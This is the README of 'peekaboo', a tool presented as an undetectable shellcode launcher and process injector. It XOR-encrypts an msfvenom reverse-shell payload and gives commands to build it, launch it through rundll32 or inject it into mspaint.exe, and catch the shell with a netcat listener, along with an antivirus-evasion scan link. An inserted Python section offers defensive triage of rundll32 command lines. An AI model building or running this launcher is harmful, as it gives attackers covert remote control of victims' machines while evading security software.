Simple undetectable shellcode and code injector launcher example. Inspired by RTO malware development course.
XOR encryption and decryption for function calls and the main payload. An msfvenom reverse shell is used as the example.
check your IP:
ip a
run python script with flags:
python3 peekaboo.py -l 192.168.56.1 -p 4444 --build 1
run on powershell or cmd prompt:
rundll32 .\peekaboo.dll, lCiSdbvIAaeZLHFfkUhEcbOy
check your netcat listener:
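From the defender's side, the rundll32 step above leaves a recognisable process command line: a DLL loaded from a relative path, called through a random-looking export name. The Python triage below is an added example, not part of the peekaboo project; the thresholds, the path list and every sample line except the one quoted from this page are assumptions constructed for illustration.

```python
import math
import re
from collections import Counter

# rundll32 <dll>,<export>; rundll32 tolerates a space after the comma.
RUNDLL = re.compile(
    r'rundll32(?:\.exe)?"?\s+"?(?P<dll>[^",]+?)"?\s*,\s*(?P<export>#?\w+)', re.I)
# Relative or user-writable locations (illustrative list, an assumption).
ODD_PATH = re.compile(r'\.{1,2}[\\/]|.*\\(users|temp|programdata|downloads)\\', re.I)

def entropy(s):
    """Shannon entropy of s in bits per character."""
    return -sum(n / len(s) * math.log2(n / len(s)) for n in Counter(s).values())

def case_flips(s):
    """Fraction of adjacent character pairs that switch letter case."""
    return sum(a.isupper() != b.isupper() for a, b in zip(s, s[1:])) / max(len(s) - 1, 1)

def triage(cmdline):
    """Return the reasons a process command line looks like an odd rundll32 launch."""
    m = RUNDLL.search(cmdline)
    if not m:
        return []
    dll, export = m.group("dll").strip(), m.group("export")
    reasons = []
    if ODD_PATH.match(dll):
        reasons.append("dll in relative or user-writable path")
    # Thresholds are illustrative; tune them against your own process telemetry.
    if (len(export) >= 16 and export.isalpha()
            and entropy(export) >= 4.0 and case_flips(export) >= 0.4):
        reasons.append("random-looking export name")
    return reasons

# Constructed process-creation command lines (Sysmon Event ID 1 / Security 4688 style).
SAMPLE = [
    r"rundll32 .\peekaboo.dll, lCiSdbvIAaeZLHFfkUhEcbOy",  # command shown on this page
    r"C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL desk.cpl",  # benign
    r"rundll32.exe C:\Windows\System32\printui.dll,PrintUIEntry /?",  # benign
    r"notepad.exe C:\notes.txt",  # not rundll32
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(triage(line), "<-", line)
```

Ordinary exports such as DllRegisterServer stay below both name thresholds, so a DLL in a user-writable path with a normal export raises only the path reason.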
check attacker ip:
ip a
run python script on linux (for example process mspaint.exe):
python3 peekaboo.py -l 192.168.56.1 -p 4444 -e mspaint.exe --build 2
.\peekaboo.exe
or click (if -m windows param)
check your netcat listener:
run python script on linux (for example process mspaint.exe):
python3 peekaboo.py -l 192.168.56.1 -p 4444 -e mspaint.exe -m console --build 3
.\peekaboo.exe
Tested on:
02 september 2021
30 december 2021 (NT API injector)
11 january 2022 (NT API injector)
https://antiscan.me/scan/new/result?id=rQVfQhoFYgH9
This tool is a Proof of Concept and is for Educational Purposes Only!!! The author takes no responsibility for any damage you cause.